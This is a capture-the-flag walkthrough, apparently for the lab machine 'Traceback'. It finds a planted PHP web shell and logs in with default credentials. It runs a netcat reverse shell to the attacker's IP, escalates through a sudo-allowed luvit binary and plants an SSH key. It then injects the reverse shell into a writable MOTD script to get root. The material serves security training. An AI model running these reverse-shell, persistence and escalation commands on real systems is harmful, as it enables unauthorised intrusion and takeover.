# Traceback

## Nmap

```
sudo nmap 10.10.10.181 -p- -sS -sV           

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Jumping straight into port 80 we are presented with the page below:

![http://10.10.10.181/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6d96e2e48b5e7c5e929e3a547271f5f208f32d8f%2Fimage.png?alt=media)

Viewing the source for this web page shows the hacker has left a hint 'Some of the best web shells that you might need ;)'.

![view-source:http://10.10.10.181/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c8420bb83838e93ce14afb9f0bde89c11feaa55%2Fimage.png?alt=media)

From here I executed dirsearch.py with the CommonBackdoors-PHP.fuzz.txt wordlist from seclists which can be found here: <https://github.com/danielmiessler/SecLists>.

```
sudo python3 dirsearch.py -u http://10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt --full-url -t 75 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5afb4e7264039d5c1bbf535d495368d12c4262de%2Fimage.png?alt=media)

dirsearch.py finds smevk.php from the wordlist. Browsing to the PHP webshell shows the following below:

![http://10.10.10.181/smevk.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aa48cca9f3db4e78c8e6b08524ffddcf062b87aa%2Fimage.png?alt=media)

Looking up the credentials for the SmEvK web shell we get the following GitHub link:<https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/smevk.php>

This shows that the defaults are `admin:admin`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5d47598e9d53c8e440ee1967ba04748892a998e8%2Fimage.png?alt=media)

Once logged in we get the page below:

![http://10.10.10.181/smevk.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-43017812a8a205498fa7e3771bf6113130742af8%2Fimage.png?alt=media)

Heading over to the 'console' tab we see that when running `which nc` that `netcat` is installed. I set up a local listener on my attacking machine.

```
sudo nc -lvp 80
```

Then executed the following command on the web shell to gain a full reverse shell.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 80 >/tmp/f
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9cc735ed18fc985343c6a8e77ae652e9191af9a0%2Fimage.png?alt=media)

Checking the users in `/home/` we have sysadmin and webadmin. The user webadmin has a note.txt file in their desktop.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-17e54c5ee7afe9bb4e2d76dc4d1c9e89fc9fe636%2Fimage.png?alt=media)

Following this I was unable to find the tool which was mentioned. I then checked sudo privileges with `sudo -l` and took note that we can run `sudo` as the user sysadmin without specifying a password on the path `/home/sysadmin/luvit`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2aaa9aff48b763e1df8a1f5d55e004a77217a962%2Fimage.png?alt=media)

Running the following command allows us to start the binary but seems to throw an exception and kick us out immediately.

```
sudo -u sysadmin /home/sysadmin/luvit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-17f1be534d34e3a8abdcc0bbaf6fe2da232b0d4b%2Fimage.png?alt=media)

Looking up LUA on [GTFOBins](https://gtfobins.github.io/gtfobins/lua/) shows we may be able to spawn a system shell with the privileges of the executing user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2b970f6fe8ab3b9b14f4388593838aefb94d920c%2Fimage.png?alt=media)

Using this I run the following command replacing 'lua' with 'luvit'.

```
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e1adb62e3ab3fe59462d9e7937abdf1edc6d44db%2Fimage.png?alt=media)

Which in turn gives us a shell as the user 'sysadmin'. Next use the following command to upgrade the shell.

```
/usr/bin/script -qc /bin/bash /dev/null
```

From here I opted to gain `SSH` access. As we do not know the password of the sysadmin user I will instead drop my attacking machines id\_rsa.pub contents into `/home/sysadmin/.ssh/authorized_keys` file.

If you do not have a `id_rsa.pub` file on the attacking machine run the following command and hit enter on all options.

```
ssh-keygen -t rsa
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01db10a6f021f72cb90789a06249eaa72d6b26d3%2Fimage.png?alt=media)

Then cat the contents of `id_rsa.pub`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-714b303ebc06cc739e471d4ca191688825ecf854%2Fimage.png?alt=media)

Then echo in the `authorized_keys` file on the target machine.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79db7ca58d7bc149092f7e182dcc45bd4e7edc3b%2Fimage.png?alt=media)

We can then log into `SSH` as the user sysadmin.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-562fb58f49f8b134f78dadd2cbdc262630bf740e%2Fimage.png?alt=media)

We also see the hacker has altered the MOTD banner when logging in. We can check the permissions of this in `/etc/updatemotd.d/`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c032dc697a97f1791068615f7aae042a8075270%2Fimage.png?alt=media)

As we have write permissions over these files I will simply inject a `netcat` reverse shell into the first script run which is 00-header.

Set a `netcat` listener on the attacking machine then run the following command on the target machine:

```
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 80 >/tmp/f' >> 00-header
```

Once completed log out of `SSH` and back in to execute. The login should hang and fail to complete.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cc4149f693a36d2dd7e4791d70a256f4b5cebb7c%2Fimage.png?alt=media)

Resulting in a root shell on the `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-860b9213e004d1ec9221f8224b74c736b411cde9%2Fimage.png?alt=media)